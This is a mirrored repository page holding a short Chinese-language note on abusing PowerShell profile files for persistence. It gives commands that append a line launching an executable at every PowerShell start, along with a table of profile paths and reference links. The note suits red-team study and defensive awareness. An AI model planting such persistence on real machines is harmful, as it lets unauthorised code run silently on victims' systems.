qwqdanchun
/
Malware-Note
mirror of https://github.com/qwqdanchun/Malware-Note.git
1
0
Fork 0
Code Issues Projects Releases Wiki Activity
Malware-Note/persistence/uncatelogued/powershell-profile.md

1.1 KiB
Raw Permalink Blame History

滥用POWERSHELL配置文件

PowerShell启动时会执行配置文件的内容。

Powershell

echo $profile
Test-Path $profile
New-Item -Path $profile -Type File Force
$string = 'Start-Process "C:\Temp\qwqdanchun.exe"'
$string | Out-File -FilePath "%HOMEPATH%\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append

Powershell默认配置文件有多个按照从上到下的顺序优先级从高到低

Description Path
All Users, All Hosts $PSHOME\Profile.ps1
All Users, Current Host $PSHOME\Microsoft.PowerShell_profile.ps1
Current User, All Hosts $Home[My ]Documents\PowerShell\Profile.ps1
Current user, Current Host $Home[My ]Documents\PowerShell\Microsoft.PowerShell_profile.ps1

参考文章:

{% embed url="https://github.com/enigma0x3/PowershellProfile" caption="" %}

{% embed url="https://enigma0x3.net/2014/06/16/abusing-powershell-profiles/" caption="" %}

{% embed url="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.1&viewFallbackFrom=powershell-6" caption="" %}